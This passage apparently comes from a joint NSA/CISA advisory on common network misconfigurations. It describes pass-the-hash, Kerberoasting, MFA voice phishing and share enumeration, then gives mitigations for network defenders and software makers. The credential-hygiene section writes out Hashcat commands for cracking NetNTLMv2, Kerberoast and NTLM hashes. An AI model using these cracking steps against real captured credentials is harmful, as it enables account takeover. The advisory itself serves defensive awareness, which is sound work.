Using software or hardware that is no longer supported by the vendor poses a significant security risk because new and existing vulnerabilities are no longer patched. Malicious actors can exploit vulnerabilities in these systems to gain unauthorized access, compromise sensitive data, and disrupt operations [T1210].

Assessment teams frequently observe organizations using unsupported Windows operating systems without updates MS17-010 and MS08-067. These updates, released years ago, address critical remote code execution vulnerabilities.[17],[18]

6. Bypass of System Access Controls

A malicious actor can bypass system access controls by compromising alternate authentication methods in an environment. If a malicious actor can collect hashes in a network, they can use the hashes to authenticate using non-standard means, such as pass-the-hash (PtH) [T1550.002]. By mimicking accounts without the clear-text password, an actor can expand and fortify their access without detection. Kerberoasting is also one of the most time-efficient ways to elevate privileges and move laterally throughout an organization’s network.

7. Weak or Misconfigured MFA Methods

Misconfigured Smart Cards or Tokens

Some networks (generally government or DoD networks) require accounts to use smart cards or tokens. Multifactor requirements can be misconfigured so the password hashes for accounts never change. Even though the password itself is no longer used—because the smart card or token is required instead—there is still a password hash for the account that can be used as an alternative credential for authentication. If the password hash never changes, once a malicious actor has an account’s password hash [T1111], the actor can use it indefinitely, via the PtH technique for as long as that account exists.

Lack of Phishing-Resistant MFA

Some forms of MFA are vulnerable to phishing, “push bombing” [T1621], exploitation of Signaling System 7 (SS7) protocol vulnerabilities, and/or “SIM swap” techniques. These attempts, if successful, may allow a threat actor to gain access to MFA authentication credentials or bypass MFA and access the MFA-protected systems. (See CISA’s Fact Sheet Implementing Phishing-Resistant MFA for more information.)[3]

For example, assessment teams have used voice phishing to convince users to provide missing MFA information [T1598]. In one instance, an assessment team knew a user’s main credentials, but their login attempts were blocked by MFA requirements. The team then masqueraded as IT staff and convinced the user to provide the MFA code over the phone, allowing the team to complete their login attempt and gain access to the user’s email and other organizational resources.

8. Insufficient ACLs on Network Shares and Services

Data shares and repositories are primary targets for malicious actors. Network administrators may improperly configure ACLs to allow for unauthorized users to access sensitive or administrative data on shared drives.

Actors can use commands, open source tools, or custom malware to look for shared folders and drives [T1135].

  • In one compromise, a team observed actors use the net share command—which displays information about shared resources on the local computer—and the ntfsinfo command to search network shares on compromised computers. In the same compromise, the actors used a custom tool, CovalentStealer, which is designed to identify file shares on a system, categorize the files [T1083], and upload the files to a remote server [TA0010].[19],[20]
  • Ransomware actors have used the SoftPerfect® Network Scanner, netscan.exe—which can ping computers [T1018], scan ports [T1046], and discover shared folders—and SharpShares to enumerate accessible network shares in a domain.[21],[22]

Malicious actors can then collect and exfiltrate the data from the shared drives and folders. They can then use the data for a variety of purposes, such as extortion of the organization or as intelligence when formulating intrusion plans for further network compromise. Assessment teams routinely find sensitive information on network shares [T1039] that could facilitate follow-on activity or provide opportunities for extortion. Teams regularly find drives containing cleartext credentials [T1552] for service accounts, web applications, and even domain administrators.

Even when further access is not directly obtained from credentials in file shares, there can be a treasure trove of information for improving situational awareness of the target network, including the network’s topology, service tickets, or vulnerability scan data. In addition, teams regularly identify sensitive data and PII on shared drives (e.g., scanned documents, social security numbers, and tax returns) that could be used for extortion or social engineering of the organization or individuals.

9. Poor Credential Hygiene

Poor credential hygiene facilitates threat actors in obtaining credentials for initial access, persistence, lateral movement, and other follow-on activity, especially if phishing-resistant MFA is not enabled. Poor credential hygiene includes:

  • Easily crackable passwords
  • Cleartext password disclosure

Easily Crackable Passwords

Easily crackable passwords are passwords that a malicious actor can guess within a short time using relatively inexpensive computing resources. The presence of easily crackable passwords on a network generally stems from a lack of password length (i.e., shorter than 15 characters) and randomness (i.e., is not unique or can be guessed). This is often due to lax requirements for passwords in organizational policies and user training. A policy that only requires short and simple passwords leaves user passwords susceptible to password cracking. Organizations should provide or allow employee use of password managers to enable the generation and easy use of secure, random passwords for each account.

Often, when a credential is obtained, it is a hash (one-way encryption) of the password and not the password itself. Although some hashes can be used directly with PtH techniques, many hashes need to be cracked to obtain usable credentials. The cracking process takes the captured hash of the user’s plaintext password and leverages dictionary wordlists and rulesets, often using a database of billions of previously compromised passwords, in an attempt to find the matching plaintext password [T1110.002].

One of the primary ways to crack passwords is with the open source tool, Hashcat, combined with password lists obtained from publicly released password breaches. Once a malicious actor has access to a plaintext password, they are usually limited only by the account’s permissions. In some cases, the actor may be restricted or detected by advanced defense-in-depth and zero trust implementations as well, but this has been a rare finding in assessments thus far.

Assessment teams have cracked password hashes for NTLM users, Kerberos service account tickets, NetNTLMv2, and PFX stores [T1555], enabling the team to elevate privileges and move laterally within networks. In 12 hours, one team cracked over 80% of all users’ passwords in an Active Directory, resulting in hundreds of valid credentials.
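
For context, the cracking step typically amounts to feeding captured hashes to Hashcat with the appropriate mode and a wordlist; a sketch with placeholder file names:

# NetNTLMv2 challenge/response captures (mode 5600)
hashcat -m 5600 netntlmv2.hashes wordlist.txt -r rules/best64.rule

# Kerberoasted service tickets, RC4/etype 23 (mode 13100)
hashcat -m 13100 kerberoast.hashes wordlist.txt

# NTLM hashes, e.g., from a domain database dump (mode 1000)
hashcat -m 1000 ntlm.hashes wordlist.txt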

Cleartext Password Disclosure

Storing passwords in cleartext is a serious security risk. A malicious actor with access to files containing cleartext passwords [T1552.001] could use these credentials to log into the affected applications or systems under the guise of a legitimate user. Accountability is lost in this situation as any system logs would record valid user accounts accessing applications or systems.

Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining cleartext passwords. Assessment teams frequently discover cleartext passwords, allowing them to quickly escalate the emulated intrusion from the compromise of a regular domain user account to that of a privileged account, such as a Domain or Enterprise Administrator. A common tool used for locating cleartext passwords is the open source tool, Snaffler.[23]

10. Unrestricted Code Execution

If unverified programs are allowed to execute on hosts, a threat actor can run arbitrary, malicious payloads within a network.

Malicious actors often execute code after gaining initial access to a system. For example, after a user falls for a phishing scam, the actor usually convinces the victim to run code on their workstation to gain remote access to the internal network. This code is usually an unverified program that has no legitimate purpose or business reason for running on the network.

Assessment teams and malicious actors frequently leverage unrestricted code execution in the form of executables, dynamic link libraries (DLLs), HTML applications, and macros (scripts used in office automation documents) [T1059.005] to establish initial access, persistence, and lateral movement. In addition, actors often use scripting languages [T1059] to obscure their actions [T1027.010] and bypass allowlisting—where organizations restrict applications and other forms of code by default and only allow those that are known and trusted. Further, actors may load vulnerable drivers and then exploit the drivers’ known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device [T1068].

MITIGATIONS

Network Defenders

NSA and CISA recommend network defenders implement the recommendations that follow to mitigate the issues identified in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST) as well as with the MITRE ATT&CK Enterprise Mitigations and MITRE D3FEND frameworks.

The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.[24]

Mitigate Default Configurations of Software and Applications
Recommendations for network defenders:

Default configurations of software and applications:
  • Modify the default configuration of applications and appliances before deployment in a production environment [M1013],[D3-ACH]. Refer to hardening guidelines provided by the vendor and related cybersecurity guidance (e.g., DISA’s Security Technical Implementation Guides (STIGs) and configuration guides).[25],[26],[27]

Default credentials:
  • Change or disable vendor-supplied default usernames and passwords of services, software, and equipment when installing or commissioning [CPG 2.A].
  • When resetting passwords, enforce the use of “strong” passwords (i.e., passwords that are more than 15 characters and random [CPG 2.B]) and follow hardening guidelines provided by the vendor, STIGs, NSA, and/or NIST [M1027],[D3-SPP].[25],[26],[28],[29]

Insecure Active Directory Certificate Services:
  • Ensure the secure configuration of ADCS implementations. Regularly update and patch the controlling infrastructure (e.g., for CVE-2021-36942), employ monitoring and auditing mechanisms, and implement strong access controls to protect the infrastructure.
  • If not needed, disable web enrollment on ADCS servers. See Microsoft: Uninstall-AdcsWebEnrollment (ADCSDeployment) for guidance.[30]
  • If web enrollment is needed on ADCS servers:
    • Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment by choosing the “Required” option. For guidance, see Microsoft: KB5021989: Extended Protection for Authentication.[31]
    • Enable “Require SSL” on the ADCS server.
    • Disable NTLM on all ADCS servers. For guidance, see Microsoft: Network security: Restrict NTLM in this domain and Network security: Restrict NTLM: Incoming NTLM traffic.[32],[33]
    • Disable SAN for UPN mapping. For guidance, see Microsoft: How to disable the SAN for UPN mapping. Instead, smart card authentication can use the altSecurityIdentities attribute for explicit mapping of certificates to accounts more securely.[34]
  • Review all permissions on the ADCS templates on applicable servers. Restrict enrollment rights to only those users or groups that require them. Disable the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag from templates to prevent users from supplying and editing sensitive security settings within these templates. Enforce manager approval for requested certificates. Remove FullControl, WriteDacl, and Write property permissions from low-privileged groups, such as domain users, on certificate template objects.

Insecure legacy protocols/services:
  • Determine if LLMNR and NetBIOS are required for essential business operations.
  • If not required, disable LLMNR and NetBIOS in local computer security settings or by group policy.

Insecure SMB service:
  • Require SMB signing for both SMB client and server on all systems.[25] This should prevent certain adversary-in-the-middle and pass-the-hash techniques. For more information on SMB signing, see Microsoft: Overview of Server Message Block Signing.[35] Note: Beginning in Microsoft Windows 11 Insider Preview Build 25381, Windows requires SMB signing for all communications.[36]
Mitigate Improper Separation of User/Administrator Privilege
Recommendations for network defenders (addressing excessive account privileges, elevated service account permissions, and non-essential use of elevated accounts):
  • Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform, and review logs of user actions to detect unauthorized use and abuse. Apply least privilege principles to user accounts and groups, allowing only the performance of authorized actions.
  • Audit user accounts and remove those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.
  • Restrict use of privileged accounts to perform general tasks, such as accessing emails and browsing the Internet [CPG 2.E],[D3-UAP]. See NSA Cybersecurity Information Sheet (CSI) Defend Privileges and Accounts for more information.[37]
  • Limit the number of users within the organization with an identity and access management (IAM) role that has administrator privileges. Strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles, and policies.
  • Implement time-based access for privileged accounts. For example, the just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model) by setting network-wide policy to automatically disable admin accounts at the Active Directory level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. In cloud environments, just-in-time elevation is also appropriate and may be implemented using per-session federated claims or privileged access management tools.
  • Restrict domain users from being in the local administrator group on multiple systems.
  • Run daemonized applications (services) with non-administrator accounts when possible.
  • Only configure service accounts with the permissions necessary for the services they control to operate.
  • Disable unused services and implement ACLs to protect services.
Mitigate Insufficient Internal Network Monitoring
Misconfiguration | Recommendations for Network Defenders
Insufficient internal network monitoring
- Establish a baseline of applications and services, and routinely audit their access and use, especially for administrative activity [D3-ANAA]. For instance, administrators should routinely audit the access lists and permissions for all web applications and services [CPG 2.O],[M1047]. Look for suspicious accounts, investigate them, and remove accounts and credentials, as appropriate, such as accounts of former staff.[39]
- Establish a baseline that represents an organization’s normal traffic activity, network performance, host application activity, and user behavior; investigate any deviations from that baseline [D3-NTCD],[D3-CSPP],[D3-UBA].[40]
- Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise, and correct them [M1047].
- Implement a security information and event management (SIEM) system to provide log aggregation, correlation, querying, visualization, and alerting from network endpoints, logging systems, endpoint detection and response (EDR) systems, and intrusion detection systems (IDS) [CPG 2.T],[D3-NTA].
Mitigate Lack of Network Segmentation
Misconfiguration | Recommendations for Network Defenders
Lack of network segmentation
- Implement next-generation firewalls to perform deep packet filtering, stateful inspection, and application-level packet inspection [D3-NTF]. Deny or drop improperly formatted traffic that is incongruent with application-specific traffic permitted on the network. This practice limits an actor’s ability to abuse allowed application protocols. The practice of allowlisting network applications does not rely on generic ports as filtering criteria, enhancing filtering fidelity. For more information on application-aware defenses, see NSA CSI Segment Networks and Deploy Application-Aware Defenses.[41]
- Engineer network segments to isolate critical systems, functions, and resources [CPG 2.F],[D3-NI]. Establish physical and logical segmentation controls, such as virtual local area network (VLAN) configurations and properly configured access control lists (ACLs) on infrastructure devices [M1030]. These devices should be baselined and audited to prevent access to potentially sensitive systems and information. Leverage properly configured demilitarized zones (DMZs) to reduce service exposure to the Internet.[42],[43],[44]
- Implement separate Virtual Private Cloud (VPC) instances to isolate essential cloud systems. Where possible, implement virtual machines (VMs) and network function virtualization (NFV) to enable micro-segmentation of networks in virtualized environments and cloud data centers. Employ secure VM firewall configurations in tandem with macro-segmentation.
Mitigate Poor Patch Management
Misconfiguration | Recommendations for Network Defenders
Poor patch management: Lack of regular patching
- Ensure organizations implement and maintain an efficient patch management process that enforces the use of up-to-date, stable versions of OSs, browsers, and software [M1051],[D3-SU].[45]
- Update software regularly by employing patch management for externally exposed applications, internal enterprise endpoints, and servers. Prioritize patching known exploited vulnerabilities.[2]
- Automate the update process as much as possible and use vendor-provided updates. Consider using automated patch management tools and software update tools.
- Where patching is not possible due to limitations, segment networks to limit exposure of the vulnerable system or host.
Poor patch management: Use of unsupported OSs and outdated firmware
- Evaluate the use of unsupported hardware and software and discontinue use as soon as possible. If discontinuing is not possible, implement additional network protections to mitigate the risk.[45]
- Patch the Basic Input/Output System (BIOS) and other firmware to prevent exploitation of known vulnerabilities.
Mitigate Bypass of System Access Controls
Misconfiguration | Recommendations for Network Defenders
Bypass of system access controls
- Limit credential overlap across systems to prevent credential compromise and reduce a malicious actor’s ability to move laterally between systems [M1026],[D3-CH]. Implement a method for monitoring non-standard logon events through host log monitoring [CPG 2.G].
- Implement an effective and routine patch management process. Mitigate PtH techniques by applying patch KB2871997 to Windows 7 and newer versions to limit default access of accounts in the local administrator group [M1051],[D3-SU].[46]
- Enable the PtH mitigations to apply User Account Control (UAC) restrictions to local accounts upon network logon [M1052],[D3-UAP].
- Deny domain users the ability to be in the local administrator group on multiple systems [M1018],[D3-UAP].
- Limit workstation-to-workstation communications. All workstation communications should occur through a server to prevent lateral movement [M1018],[D3-UAP].
- Use privileged accounts only on systems requiring those privileges [M1018],[D3-UAP]. Consider using dedicated Privileged Access Workstations for privileged accounts to better isolate and protect them.[37]
Mitigate Weak or Misconfigured MFA Methods
Misconfiguration | Recommendations for Network Defenders
Weak or misconfigured MFA methods: Misconfigured smart cards or tokens
In Windows environments:
- Disable the use of New Technology LAN Manager (NTLM) and other legacy authentication protocols that are susceptible to PtH due to their use of password hashes [M1032],[D3-MFA]. For guidance, see Microsoft: Network security: Restrict NTLM: NTLM authentication in this domain and Network security: Restrict NTLM: Incoming NTLM traffic.[32],[33]
- Use built-in functionality via Windows Hello for Business or Group Policy Objects (GPOs) to regularly re-randomize password hashes associated with smartcard-required accounts. Ensure that the hashes are changed at least as often as organizational policy requires passwords to be changed [M1027],[D3-CRO]. Prioritize upgrading any environments that cannot utilize this built-in functionality.
- As a longer-term effort, implement a cloud-primary authentication solution using modern open standards. See CISA’s Secure Cloud Business Applications (SCuBA) Hybrid Identity Solutions Architecture for more information.[47] Note: This document is part of CISA’s Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies to secure their cloud business application environments and to protect federal information that is created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project’s guidance is applicable to all organizations.[48]
Weak or misconfigured MFA methods: Lack of phishing-resistant MFA
- Enforce phishing-resistant MFA universally for access to sensitive data and on as many other resources and services as possible [CPG 2.H].[3],[49]
Mitigate Insufficient ACLs on Network Shares and Services
Misconfiguration | Recommendations for Network Defenders
Insufficient ACLs on network shares and services
- Implement secure configurations for all storage devices and network shares that grant access to authorized users only.
- Apply the principle of least privilege to important information resources to reduce risk of unauthorized data access and manipulation.
- Apply restrictive permissions to files and directories, and prevent adversaries from modifying ACLs [M1022],[D3-LFP].
- Set restrictive permissions on files and folders containing sensitive private keys to prevent unintended access [M1022],[D3-LFP].
- Enable the Windows Group Policy security setting “Do Not Allow Anonymous Enumeration of Security Account Manager (SAM) Accounts and Shares” to limit users who can enumerate network shares.
Mitigate Poor Credential Hygiene
Misconfiguration | Recommendations for Network Defenders
Poor credential hygiene: Easily crackable passwords
- Follow National Institute of Standards and Technology (NIST) guidelines when creating password policies to enforce use of “strong” passwords that cannot be cracked [M1027],[D3-SPP].[29] Consider using password managers to generate and store passwords.
- Do not reuse local administrator account passwords across systems. Ensure that passwords are “strong” and unique [CPG 2.B],[M1027],[D3-SPP].
- Use “strong” passphrases for private keys to make cracking resource intensive.
- Do not store credentials within the registry in Windows systems. Establish an organizational policy that prohibits password storage in files.
- Ensure adequate password length (ideally 25+ characters) and complexity requirements for Windows service accounts and implement passwords with periodic expiration on these accounts [CPG 2.B],[M1027],[D3-SPP]. Use Managed Service Accounts, when possible, to manage service account passwords automatically.
Poor credential hygiene: Cleartext password disclosure
- Implement a review process for files and systems to look for cleartext account credentials. When credentials are found, remove, change, or encrypt them [D3-FE]. Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, protected health information) or credentials are stored.
- Weigh the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is of significant concern, technical controls, policy, and user training may prevent storage of credentials in improper locations.
- Store hashed passwords using Committee on National Security Systems Policy (CNSSP)-15 and Commercial National Security Algorithm Suite (CNSA) approved algorithms.[50],[51]
- Consider using group Managed Service Accounts (gMSAs) or third-party software to implement secure password-storage applications.
Mitigate Unrestricted Code Execution
Misconfiguration | Recommendations for Network Defenders
Unrestricted code execution
- Enable system settings that prevent the ability to run applications downloaded from untrusted sources.[52]
- Use application control tools that restrict program execution by default, also known as allowlisting [D3-EAL]. Ensure that the tools examine digital signatures and other key attributes, rather than just relying on filenames, especially since malware often attempts to masquerade as common operating system (OS) utilities [M1038]. Explicitly allow certain .exe files to run, while blocking all others by default.
- Block or prevent the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment [D3-OSM].
- Constrain scripting languages to prevent malicious activities, audit script logs, and restrict scripting languages that are not used in the environment [D3-SEA]. See joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace.[53]
- Use read-only containers and minimal images, when possible, to prevent the running of commands.
- Regularly analyze border and host-level protections, including spam-filtering capabilities, to ensure their continued effectiveness in blocking the delivery and execution of malware [D3-MA]. Assess whether HTML Application (HTA) files are used for business purposes in your environment; if HTAs are not used, remap the default program for opening them from mshta.exe to notepad.exe.

Software Manufacturers

NSA and CISA recommend software manufacturers implement the recommendations in Table 11 to reduce the prevalence of misconfigurations identified in this advisory. These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default. NSA and CISA strongly encourage software manufacturers to apply these recommendations to ensure their products are secure “out of the box” and do not require customers to spend additional resources making configuration changes, performing monitoring, and conducting routine updates to keep their systems secure.[1]

Misconfiguration | Recommendations for Software Manufacturers
Default configurations of software and applications
- Embed security controls into product architecture from the start of development and throughout the entire SDLC by following best practices in NIST’s Secure Software Development Framework (SSDF), SP 800-218.[54]
- Provide software with security features enabled “out of the box” and accompanied by “loosening” guides instead of hardening guides. “Loosening” guides should explain the business risk of decisions in plain, understandable language.
Default configurations of software and applications: Default credentials
- Eliminate default passwords: Do not provide software with default passwords that are universally shared. To eliminate default passwords, require administrators to set a “strong” password [CPG 2.B] during installation and configuration.
Default configurations of software and applications: Default service permissions and configuration settings
- Consider the user experience consequences of security settings: Each new setting increases the cognitive burden on end users and should be assessed in conjunction with the business benefit it derives. Ideally, a setting should not exist; instead, the most secure setting should be integrated into the product by default. When configuration is necessary, the default option should be broadly secure against common threats.
Improper separation of user/administrator privilege: excessive account privileges, elevated service account permissions, and non-essential use of elevated accounts
- Design products so that the compromise of a single security control does not result in compromise of the entire system. For example, ensuring that user privileges are narrowly provisioned by default and ACLs are employed can reduce the impact of a compromised account. Also, software sandboxing techniques can quarantine a vulnerability to limit compromise of an entire application.
- Automatically generate reports for:
  - Administrators of inactive accounts. Prompt administrators to set a maximum inactive time and automatically suspend accounts that exceed that threshold.
  - Administrators of accounts with administrator privileges, and suggest ways to reduce privilege sprawl.
- Automatically alert administrators of infrequently used services and provide recommendations for disabling them or implementing ACLs.
Insufficient internal network monitoring
- Provide high-quality audit logs to customers at no extra charge. Audit logs are crucial for detecting and escalating potential security incidents. They are also crucial during an investigation of a suspected or confirmed security incident. Consider best practices such as providing easy integration with a security information and event management (SIEM) system with application programming interface (API) access that uses coordinated universal time (UTC), standard time zone formatting, and robust documentation techniques.
Lack of network segmentation
- Ensure products are compatible with and tested in segmented network environments.
Poor patch management: Lack of regular patching
- Take steps to eliminate entire classes of vulnerabilities by embedding security controls into product architecture from the start of development and throughout the SDLC by following best practices in NIST’s SSDF, SP 800-218.[54] Pay special attention to:
  - Following secure coding practices [SSDF PW 5.1]. Use memory-safe programming languages where possible, parametrized queries, and web template languages.
  - Conducting code reviews [SSDF PW 7.2, RV 1.2] against peer coding standards, checking for backdoors, malicious content, and logic flaws.
  - Testing code to identify vulnerabilities and verify compliance with security requirements [SSDF PW 8.2].
- Ensure that published CVEs include root cause or common weakness enumeration (CWE) to enable industry-wide analysis of software security design flaws.
Poor patch management: Use of unsupported OSs and outdated firmware
- Communicate the business risk of using unsupported OSs and firmware in plain, understandable language.
Bypass of system access controls
- Provide sufficient detail in audit records to detect bypass of system controls, and provide queries to monitor audit logs for traces of such suspicious activity (e.g., when an essential step of an authentication or authorization flow is missing).
Weak or misconfigured MFA methods: Misconfigured smart cards or tokens
- Fully support MFA for all users, making MFA the default rather than an opt-in feature. Utilize threat modeling for authentication assertions and alternate credentials to examine how they could be abused to bypass MFA requirements.
Weak or misconfigured MFA methods: Lack of phishing-resistant MFA
- Mandate MFA, ideally phishing-resistant, for privileged users and make MFA a default rather than an opt-in feature.[3]
Insufficient ACLs on network shares and services
- Enforce use of ACLs, with default ACLs allowing only the minimum access needed, along with easy-to-use tools to regularly audit and adjust ACLs to the minimum access needed.
Poor credential hygiene: Easily crackable passwords
- Allow administrators to configure a password policy consistent with NIST’s guidelines; do not require counterproductive restrictions such as enforcing character types or the periodic rotation of passwords.[29]
- Allow users to use password managers to effortlessly generate and use secure, random passwords within products.
Poor credential hygiene: Cleartext password disclosure
- Salt and hash passwords using a secure hashing algorithm with high computational cost to make brute-force cracking more difficult.
Unrestricted code execution
- Support execution controls within operating systems and applications “out of the box” by default, at no extra charge for all customers, to limit malicious actors’ ability to abuse functionality or launch unusual applications without administrator or informed user approval.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, NSA and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. NSA and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 12–Table 21).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

LEARN FROM HISTORY

The misconfigurations described above are all too common in assessments and the techniques listed are standard ones leveraged by multiple malicious actors, resulting in numerous real network compromises. Learn from the weaknesses of others and implement the mitigations above properly to protect the network, its sensitive information, and critical missions.

WORKS CITED

[1]   Joint Guide: Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default (2023), https://www.cisa.gov/sites/default/files/2023-06/principles_approaches_for_security-by-design-default_508c.pdf
[2]   CISA, Known Exploited Vulnerabilities Catalog, https://www.cisa.gov/known-exploited-vulnerabilities-catalog
[3]   CISA, Implementing Phishing-Resistant MFA, https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf
[4]   MITRE, ATT&CK for Enterprise, https://attack.mitre.org/versions/v13/matrices/enterprise/
[5]   MITRE, D3FEND, https://d3fend.mitre.org/
[6]   CISA, Best Practices for MITRE ATT&CK Mapping, https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping
[7]   CISA, Decider Tool, https://github.com/cisagov/Decider/
[8]   CISA, Cyber Assessment Fact Sheet, https://www.cisa.gov/sites/default/files/publications/VM_Assessments_Fact_Sheet_RVA_508C.pdf
[9]   Joint CSA: Weak Security Controls and Practices Routinely Exploited for Initial Access, https://media.defense.gov/2022/May/17/2002998718/-1/-1/0/CSA_WEAK_SECURITY_CONTROLS_PRACTICES_EXPLOITED_FOR_INITIAL_ACCESS.PDF
[10]  Microsoft KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS), https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
[11]  Raj Chandel, Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints, https://www.hackingarticles.in/domain-escalation-petitpotam-ntlm-relay-to-adcs-endpoints/
[12]  SpecterOps – Will Schroeder, Certified Pre-Owned, https://posts.specterops.io/certified-pre-owned-d95910965cd2
[13]  CISA, CSA: CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a
[14]  Joint CSA: Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a
[15]  Joint CSA: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a
[16]  Joint CSA: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a
[17]  Microsoft, How to verify that MS17-010 is installed, https://support.microsoft.com/en-us/topic/how-to-verify-that-ms17-010-is-installed-f55d3f13-7a9c-688c-260b-477d0ec9f2c8
[18]  Microsoft, Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644), https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
[19]  Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a
[20]  CISA, Malware Analysis Report: 10365227.r1.v1, https://www.cisa.gov/sites/default/files/2023-06/mar-10365227.r1.v1.clear_.pdf
[21]  Joint CSA: #StopRansomware: BianLian Ransomware Group, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
[22]  CISA Analysis Report: FiveHands Ransomware, https://www.cisa.gov/news-events/analysis-reports/ar21-126a
[23]  Snaffler, https://github.com/SnaffCon/Snaffler
[24]  CISA, Cross-Sector Cybersecurity Performance Goals, https://www.cisa.gov/cross-sector-cybersecurity-performance-goals
[25]  Defense Information Systems Agency (DISA), Security Technical Implementation Guides (STIGs), https://public.cyber.mil/stigs/
[26]  NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[27]  NSA, Actively Manage Systems and Configurations, https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf
[28]  NSA, Cybersecurity Advisories & Guidance, https://www.nsa.gov/cybersecurity-guidance
[29]  National Institute of Standards and Technology (NIST), NIST SP 800-63B: Digital Identity Guidelines: Authentication and Lifecycle Management, https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final
[30]  Microsoft, Uninstall-AdcsWebEnrollment, https://learn.microsoft.com/en-us/powershell/module/adcsdeployment/uninstall-adcswebenrollment
[31]  Microsoft, KB5021989: Extended Protection for Authentication, https://support.microsoft.com/en-au/topic/kb5021989-extended-protection-for-authentication-1b6ea84d-377b-4677-a0b8-af74efbb243f
[32]  Microsoft, Network security: Restrict NTLM: NTLM authentication in this domain, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain
[33]  Microsoft, Network security: Restrict NTLM: Incoming NTLM traffic, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic
[34]  Microsoft, How to disable the Subject Alternative Name for UPN mapping, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/disable-subject-alternative-name-upn-mapping
[35]  Microsoft, Overview of Server Message Block signing, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing
[36]  Microsoft, SMB signing required by default in Windows Insider, https://aka.ms/SmbSigningRequired
[37]  NSA, Defend Privileges and Accounts, https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf
[38]  NSA, Advancing Zero Trust Maturity Throughout the User Pillar, https://media.defense.gov/2023/Mar/14/2003178390/-1/-1/0/CSI_Zero_Trust_User_Pillar_v1.1.PDF
[39]  NSA, Continuously Hunt for Network Intrusions, https://media.defense.gov/2019/Sep/09/2002180360/-1/-1/0/Continuously%20Hunt%20for%20Network%20Intrusions%20-%20Copy.pdf
[40]  Joint CSI: Detect and Prevent Web Shell Malware, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
[41]  NSA, Segment Networks and Deploy Application-aware Defenses, https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf
